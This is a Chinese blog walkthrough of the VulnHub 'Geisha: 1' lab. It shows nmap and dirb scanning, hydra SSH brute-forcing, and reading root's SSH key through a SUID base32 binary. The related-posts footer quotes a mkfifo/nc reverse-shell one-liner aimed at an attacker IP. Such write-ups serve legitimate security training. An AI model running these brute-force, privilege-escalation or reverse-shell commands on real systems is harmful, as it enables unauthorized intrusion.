vulnhub Geisha: 1

最新推荐文章于 2023-04-11 22:09:29 发布
最新推荐文章于 2023-04-11 22:09:29 发布
阅读量661 收藏
点赞数
分类专栏: vulnhub 文章标签: hydra base32 suid passwd id_rsa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/123807326
版权

渗透思路:

nmap扫描 ---- dirb扫描发现passwd ---- passwd中查找有shell的用户 ---- hydra暴力破解geisha用户的ssh密码 ---- base32越权查看root的ssh私钥 ---- root使用私钥登录ssh

环境信息:

靶机:192.168.101.51

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sC -sV -p- 192.168.101.51

扫出来21端口ftp,但是估计是要用户名密码的;

22端口ssh;

还有一堆http、https:80、7080、7125、8088、9198

2、dirb扫描

把所有http、https端口都dirb扫描一遍

dirb http://192.168.101.51:xxxx

其他端口倒没什么有价值的,7125端口扫描到了/passwd

3、查找有shell的用户

访问http://192.168.101.51:7125/passwd,下载并查看passwd文件

有shell的用户是root和geisha

4、hydra暴力破解geisha用户ssh密码

攻击机上把/usr/share/wordlists/rockyou.txt.gz 拷贝到kali家目录下,解压为rockyou.txt,然后用hydra破解geisha用户的ssh登录密码

hydra -l geisha -P "rockyou.txt" ssh://192.168.101.51

得到密码letmein

ssh登录成功

ssh geisha@192.168.101.51

5、base32查看root的ssh私钥id_rsa

靶机上查找属主是root且有suid权限的文件

find / -user root -perm /4000 2>/dev/null

看到其中包含base32,这个命令若有suid权限是可以用属主权限来查看文件内容的,详见base32 | GTFOBins

靶机上执行

base32 /root/.ssh/id_rsa | base32 --decode

查看root用户的ssh私钥

拷贝到攻击机kali用户家目录并保存为id_rsa

6、root使用私钥登录ssh

root用户使用私钥进行ssh登录,记得要加 sudo

sudo ssh root@192.168.101.51 -i id_rsa

仙女象
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
memcached启动与清理缓存
MY进修之路
01-08 2万+
memcached启动 memcached清理缓存需要通过telnet服务
geisha:一个使用qurakus框架的项目, 名字源于瑰夏咖啡
04-12
geisha project geisha(瑰夏)是一个使用了的快速开发项目, 创立的目的是想提供一个快速可用的Quarkus后台项目. 名字来源于瑰夏咖啡. 项目特点 响应式的 非阻塞的 模块划分 geisha-service : 服务模块, 服务模块只...
vulnhub-Geisha
qq_41810304的博客
06-13 343
前言: 靶机难度是简单到中等。做靶机的心情就是大起大落。因为毕设的原因,卡了很久没有做过靶机了,有些东西都忘了,又要潜心复习一下了(我觉得没有人会像我这样吧)。听着蝉鸣做靶机竟然莫名感觉到一丝悠闲,在这夏天里,叫走了几丝闷热。 下载地址:https://www.vulnhub.com/entry/geisha-1,481/ Kali:10.1.1.129 目标机:10.1.1.128 信息收集: 漏洞挖掘: 端口有点多,每个端口都访问看看。访问后每个界面都是一样的。 难道要爆破那
vulnhub系列(1)Geisha
Npceer-一位网安初学者的博客
11-10 1022
Geisha靶机前言一、环境二、随便玩玩结尾一些想说的 前言 最近真的不知道干什么 偶尔挖挖edu 再看看java然后梦游 更新也没啥东西更新的 想着找几个靶机,稍微熟悉一下后渗透吧 也是第一次玩vulnhub,虽然之前看了很多的文章,但是像nmap这种工具都是只看过没用过,就随便试试看吧 找个初级到中级的,偷瞄一下大佬的博客去弄出来 还有就是 我的过程可能会有很多其他的东西 为了巩固自身的知识啦 无论是工具 或是命令 都会去试试看的 顺便给自己点小要求,上英文网站不用Google自带的翻译,稍微...
[网络安全学习篇79]:Geisha: 1 Vulnhub 实战
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-29 957
往期博文: [网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵 [网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵 [网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵 [网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵 [网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵 [网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵 [网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵 [网络安全学习篇76]:渗透测试实战-DC-8-靶机入侵 [网络安全学习篇7
DC3靶场练习
qq_60848021的博客
04-11 303
bin/bash -i 2>&1 | nc IP 端口 >/tmp/f: 先将上一步获取到的命令在bash终端中执行,并将结果通过nc输出到目标,并且将目标的命令重新写入临时文件f.mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 攻击者ip 端口 > /tmp/f。1,rm /tmp/f: 首先删除l临时文件f,以免造成冲突,(后面的分号;3, cat /tmp/f | /bin/bash -i 2>&1 | nc IP 端口 >/tmp/f。
Geisha: 1 靶机
小小猪的博客
07-05 194
Geisha: 1 靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.137 扫描端口 扫描目录发现passwd目录 curlhttp://x.x.x.137:7125/passwd-o passwd && cat passwd | grep home 发现用户名 hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://x.x.x.137 获得密码 ..
Vulnhub:Geisha靶机
qq_43884092的博客
03-06 88
hydra爆破ssh,得到用户密码:geisha|letmein。靶机:192.168.111.216。passwd文件发现用户名。查看suid权限的文件。读取root用户的私钥。7125端口目录爆破。
geisha1
03-08
geisha1
Geisha
10-25
"Geisha"这个主题,通常与日本艺妓文化相关,但在字体设计领域,它可能指的是一个特定的字体家族或者设计风格。让我们深入探讨一下与“Geisha”相关的字体设计知识。 首先,字体是任何设计项目的基础,它能够表达...
Panda | Hacker News, Dribbble, Designer News-crx插件
03-28
〜以前的名字是“ Geisha”。 一处轻松浏览Designer News,Dribbble,Behance,Hacker News和其他新闻。 再也不会错过任何东西。 熊猫为何如此出色:1.每天都能获得灵感,而无需走到任何地方。 2.这是获得设计灵感和...
【创新未发表】Matlab实现遗传算法GA-RF实现风电预测算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
蚁群算法(培训).pdf
08-02
蚁群算法(培训).pdf
【中科院1区】Matlab实现花朵授粉优化算法FPA-RF锂电池健康状态估计算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
基于JAVA的应急物资管理系统(Vue.js+SpringBoot+MySQL)
08-02
基于Vue.js和SpringBoot的应急物资管理系统是一个高效、易用的物资管理平台,它分为用户前台和管理后台两个部分,以满足不同角色的需求。管理员可以通过管理后台进行物资的入库、出库、库存查询等操作,同时对物资申请进行审批,确保物资的合理分配。普通用户则可以在用户前台进行健康打卡,记录自己的健康状况,并通过物资申请模块提交物资需求,以便在紧急情况下获得必要的支持。此外,系统还提供了物资运输模块,帮助管理员跟踪物资的运输状态,确保物资能够及时送达。整个系统的设计注重用户体验和操作便捷性,旨在为用户提供一个全面、高效的物资管理解决方案。 演示录屏:https://www.bilibili.com/video/BV1Nz42127g7 配套教程:https://www.bilibili.com/video/BV1pW4y1P7GR
【中科院1区】Matlab实现非洲秃鹫优化算法AVOA-RF故障诊断算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【中科院1区】Matlab实现人工蜂鸟优化算法AHA-RF故障诊断算法研究.rar
最新发布
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
地产行业数字化转型范式与应用-百分点.docx
08-02
地产行业数字化转型范式与应用-百分点.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值